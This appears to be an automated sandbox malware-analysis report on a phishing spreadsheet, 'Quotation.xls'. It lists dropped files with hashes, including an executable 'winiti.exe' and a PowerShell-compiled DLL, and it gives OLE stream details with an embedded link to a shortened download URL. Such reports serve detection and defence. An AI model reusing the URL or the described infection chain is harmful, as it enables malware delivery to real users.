                SSDEEP:24:etGSGJ2J2F8y7vUWukDqZCa0l5qHRDtkZfCqaMYOC+WI+ycuZhNTakS1PNnqI:6tUecVICl5qxiJCqljCl1ulTa3vqI
                MD5:1F63542B415DB2C9BB2893A1B6174052
                SHA1:DC3DA7A0D7BF003C374B52F764B3D946CB061A4C
                SHA-256:7A23CC15316AFB9ACDCDF87479C0ADE7A04C1CD4736F1EB2C29C726568391756
                SHA-512:C4B1AF5998404609762A0D27E2B6D8F0FC890FD97617BABFCBD7A7EFFAD7A4372ADF22306B095ABE9E4D85195B666A2FDF61FC37F806AA01ADB9F79C0BC7E3E6
                Malicious:true
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}P.f...........!.................#... ...@....... ....................................@.................................P#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................2.+.....p.....p.......................................... 9.....P ......K.........Q.....\.....^.....b.....m...K.....K...!.K.....K.......!.....*.......9......................................."..........<Module>.of

                C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.out

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                Category:modified
                Size (bytes):866
                Entropy (8bit):5.359652144899971
                Encrypted:false
                SSDEEP:24:AId3ka6KzNpEoNwKaMD5DqBVKVrdFAMBJTH:Akka60zEoOKdDcVKdBJj
                MD5:8ECCB2F2918C6354F9E8E9CF10133713
                SHA1:FBCB71E2C64F65577E9E9DAD6A313716B66E06F6
                SHA-256:2F424116F9E6A620579DBA36EF86D98E1955454919223D1A5E9423A5B5CF5744
                SHA-512:FD63A46B841463854A0D49941AC64731648B5716D05CBA12D919FEEBA16D8AE9117AE7E4EB8C7BAE0BDFADB58F784F9D38366D553B7202E60BF214489AFFAA60
                Malicious:false
                Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ofvwqfjd\ofvwqfjd.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                C:\Users\user\AppData\Local\Temp\pyktbusk.55o.ps1

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1

                C:\Users\user\AppData\Local\Temp\~DF1B9FEB1D292F091B.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF5769E9ACD5F566F4.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Local\Temp\~DF91B6A489623540E3.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):556032
                Entropy (8bit):7.930543297900913
                Encrypted:false
                SSDEEP:6144:lJ1+Jt748yJUItitCxf/yiwnmEKIsVCRzsvQ+GqNSQjt4ZEs0aOxH6EbFNKjZH4K:TcJ2vXtiyHpFV8kZhUEj7LKNYNgbFG+
                MD5:3E86E8EFDBE82661247721B516F756E5
                SHA1:EE9CC83387AD9838FE15FAA46598625E9440485E
                SHA-256:9FC5609538C5847DB08D08D3404922669C2F3CB2091F1FBE1D77FA1E07D4E8DB
                SHA-512:6FE3996294FA93E156B09ED6B861AD4A644E1F4190E0473D1C2327E5768C0584D0D017D32ACBB399F85945300B000459DFC163A71E1107A934B7055B56B7C925
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\AppData\Local\Temp\~DFEEA8520C06A11796.TMP

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):561152
                Entropy (8bit):7.875508766138141
                Encrypted:false
                SSDEEP:6144:w1+Jt748yJUItitCxf/yiwnmEKIsVCRzsvQ+GqNSQjt4ZEs0aOxH6EbFNKjZH4Ns:wcJ2vXtiyHpFV8kZhUEj7LKNYNgbFG+
                MD5:BDC59C8B85284CB08A55D70FC7957E52
                SHA1:224E36D398C00AE4D1B6A4D4C7D608B1CDDACED0
                SHA-256:0AFD7E20709AD6762B08A391951D7C13AF65F2F281D7D1CD16879DE3C94C1C59
                SHA-512:40F73581AFA2A459CC0F34931ACABD02BB9C4907C2F693267C2EF43893A9C2CE32046B2DCDB9524756A296592C9F8EC03EDB56C764CC9C3972AA52701D69A0BF
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\user\AppData\Roaming\winiti.exe

                Download File
                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                Category:dropped
                Size (bytes):2673152
                Entropy (8bit):7.219441527091625
                Encrypted:false
                SSDEEP:49152:Og7eO7kjTav5AwVZGsY3uS+s1vm1lvt+vU0JSziMwqM:j7lmmUM7wq
                MD5:4FB3E6E7B8F9C12CD2D5E161F7B94760
                SHA1:57BDAD62C6EA7F1B905C900302F918D185811A94
                SHA-256:F76F9B85DF2BA8850BEC058164D2C752C8FD8EF0F1BCFFD793E5F453D8A839BB
                SHA-512:F762AD1CCD537D06C1CF3538E433671F441F100B06D37EC34B3A3E76DFBFAD40AC7CA50EE32297C54F628B0B89D75C2C5255166CC992F9BCFF8F117F70AA179A
                Malicious:true
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......`...$n.K$n.K$n.K..J-n.K..J(n.K..J.n.K-.*K*n.Ko..J-n.K$n.K.n.K...J/n.K...J`n.K$n.K%n.K7.J%n.K7.FK%n.K7.J%n.KRich$n.K........PE..d...m.f.........."....(.....B.................@............................../...........`...........................................%.X...H.%......0(.......&..8............/.<...P.".T.....................".(.....".@...............0............................text...h........................... ..`.managed.q...0...r.................. ..`hydrated`................................rdata..&H.......J..................@..@.data.........&.."..................@....pdata...8....&..:..................@..@.rsrc........0(.......!.............@..@.reloc..<...../.......(.............@..B................................................................................................................................................................

                C:\Users\user\Desktop\37330000

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
                Category:dropped
                Size (bytes):1099264
                Entropy (8bit):7.981750201333905
                Encrypted:false
                SSDEEP:24576:P29iKjVBuNCgZGCTsW8wtwc4DFrLdDa4r:+UKjVBuNFT582wcsvVa4
                MD5:B94631477A7949939C13CA1B9E61FB62
                SHA1:6C708AB62656882E849199C13F708E6BE403AA31
                SHA-256:7B923F157A961FA88B8E59C810B11DC56985912FB1087C3350268B1DE985DE86
                SHA-512:7586EEAEEBE17A5C17C8A6CE4E394DDD4043803E1E5879DE547CE05B9106B4C50D5876A1EB5CFFD9AB8F98BA70C6F3F2DE1B96EA272498174E1E874A3DA34A86
                Malicious:false
                Preview:......................>...................................-...................................................o.......q.......s.......u...............................................................................................................................................................................................................................................................................................................................................................................................`................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                C:\Users\user\Desktop\37330000:Zone.Identifier

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:false
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Users\user\Desktop\Quotation.xls (copy)

                Download File
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Jul 26 08:30:16 2024, Security: 1
                Category:dropped
                Size (bytes):1099264
                Entropy (8bit):7.981750201333905
                Encrypted:false
                SSDEEP:24576:P29iKjVBuNCgZGCTsW8wtwc4DFrLdDa4r:+UKjVBuNFT582wcsvVa4
                MD5:B94631477A7949939C13CA1B9E61FB62
                SHA1:6C708AB62656882E849199C13F708E6BE403AA31
                SHA-256:7B923F157A961FA88B8E59C810B11DC56985912FB1087C3350268B1DE985DE86
                SHA-512:7586EEAEEBE17A5C17C8A6CE4E394DDD4043803E1E5879DE547CE05B9106B4C50D5876A1EB5CFFD9AB8F98BA70C6F3F2DE1B96EA272498174E1E874A3DA34A86
                Malicious:true
                Preview:......................>...................................-...................................................o.......q.......s.......u...............................................................................................................................................................................................................................................................................................................................................................................................`................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Jul 25 17:59:41 2024, Security: 1
                Entropy (8bit):7.9786557114017915
                TrID:
                • Microsoft Excel sheet (30009/1) 47.99%
                • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                File name:Quotation.xls
                File size:1'129'472 bytes
                MD5:36cace5745dcb32c2ab03ca4ba433394
                SHA1:2e479ac4ea9b158f39093dded3b55c360a1f2082
                SHA256:c2f6ea297ebee1570036db204177fde0e0263006637806e9b28365bb4ef14d7c
                SHA512:e2dd193741bb1f9afc3a954bba2ee75a4df1797a487366ad8577a23366f87cb946957f258ab5b493b15abcf351da294e1bca8780765c855ad9a72aed4ed058af
                SSDEEP:24576:d29iKjVBuNCgP4G2ycKiEb+S81doGvdKLQy2H7T1:0UKjVBuND4G2ciEb+SNIdOh
                TLSH:3D3523A1BE714B4AEA0A84395DF4EE92267D7C665470E8133A307B2E543577523C33EC
                File Content Preview:........................>...................................K...................................................M.......o.......q.......s.......u..............................................................................................................

                File Icon

                Icon Hash:276ea3a6a6b7bfbf

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "Quotation.xls"

                Indicators
                Has Summary Info:
                Application Name:Microsoft Excel
                Encrypted Document:True
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:False
                Flash Objects Count:0
                Contains VBA Macros:True
                Summary
                Code Page:1252
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2024-07-25 16:59:41
                Creating Application:Microsoft Excel
                Security:1
                Document Summary
                Document Code Page:1252
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:786432

                Streams with VBA

                VBA File Name: Sheet1.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                VBA File Name:Sheet1.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & h Y . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 26 68 59 f1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet2.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                VBA File Name:Sheet2.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & h J 5 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 26 68 4a 35 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: Sheet3.cls, Stream Size: 977
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                VBA File Name:Sheet3.cls
                Stream Size:977
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & h ? . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 26 68 3f e1 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                VBA File Name: ThisWorkbook.cls, Stream Size: 985
                General
                Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                VBA File Name:ThisWorkbook.cls
                Stream Size:985
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & h . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 26 68 12 bf 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                VBA Code
                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                Streams

                Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.25248375192737
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                General
                Stream Path:\x5DocumentSummaryInformation
                CLSID:
                File Type:data
                Stream Size:244
                Entropy:2.889430592781307
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                General
                Stream Path:\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:200
                Entropy:3.3020681057018666
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . Y . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: MBD00034653/\x1CompObj, File Type: data, Stream Size: 99
                General
                Stream Path:MBD00034653/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD00034653/Package, File Type: Microsoft Excel 2007+, Stream Size: 557009
                General
                Stream Path:MBD00034653/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:557009
                Entropy:7.972393889771479
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 d4 fe 94 9a b9 01 00 00 c0 06 00 00 13 00 d1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD00034654/\x1Ole, File Type: data, Stream Size: 338
                General
                Stream Path:MBD00034654/\x1Ole
                CLSID:
                File Type:data
                Stream Size:338
                Entropy:6.411144727611267
                Base64 Encoded:False
                Data ASCII:. . . . 7 y . U G . / . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . t . n . y . . . w . t . f . / . j . j . J . s . P . X . . . 0 . ? ! A . . 1 I . . 9 . . i . B l . | 3 ) [ L K i . w b 6 1 . j u . . U ; " : = . . . _ k J 5 J 5 . g 1 d e D ? t V . o U ~ w h . . G 3 2 . . . [ . . s ~ . . . $ a . u . - S . \\ , . . . . . . . . . . . . . . . . . . . . L . X . e . h . p . 8 . t . N . X . 2 . . . u . p ! z ( ^ ` . Y C d T . .
                Data Raw:01 00 00 02 37 79 0d 55 47 04 f6 2f 00 00 00 00 00 00 00 00 00 00 00 00 dc 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b d8 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 74 00 6e 00 79 00 2e 00 77 00 74 00 66 00 2f 00 6a 00 6a 00 4a 00 73 00 50 00 58 00 00 00 30 07 3f db d3 fe b2 bd 21 41 16 14 31 49 1f 94 ab 16 39 15 06 69 be d4 d7 08 42 af fc ff c9 6c ee dc 0d f2
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 549837
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:549837
                Entropy:7.999325247179491
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . l L v 9 . I 3 c I C A D q _ . r j . # . $ > A . [ E . . . . . . . . . . ] . . . \\ . p . . i % . ] . . v o P b . . y : ' I . z . . 5 . . t v 5 . ; . " | ' F . e . < . 4 . . . w . w . . . = 2 K B . . . o a . . . y . . . = . . . . | . . . a ~ x 1 n H . . . . . . . = L . . . . . . . . w . . . . . . . = . . . ` 4 . . . . . h L @ . . . . . . . j - " . . . # . . . . w . . . . . . . 1 . . . . 9 a 7 c . . Z . ) C 1 . . . . . o . * D m h . . . V V _ 1 . . . {
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 96 9d a0 6c 94 fa 98 4c 76 39 17 49 33 80 a7 63 49 43 41 44 71 5f 0b ec 72 6a a7 07 23 01 24 3e d8 41 17 5b e5 45 7f ff b7 c9 f1 07 11 fc bd ce e1 00 02 00 b0 04 c1 00 02 00 5d b5 e2 00 00 00 5c 00 70 00 e5 1f a7 69 25 7f a3 a3 fd 5d eb b7 0c 12 fe 84 76 6f 50 a7 eb b2 62 c2 d1 ab 10 79 3a 27
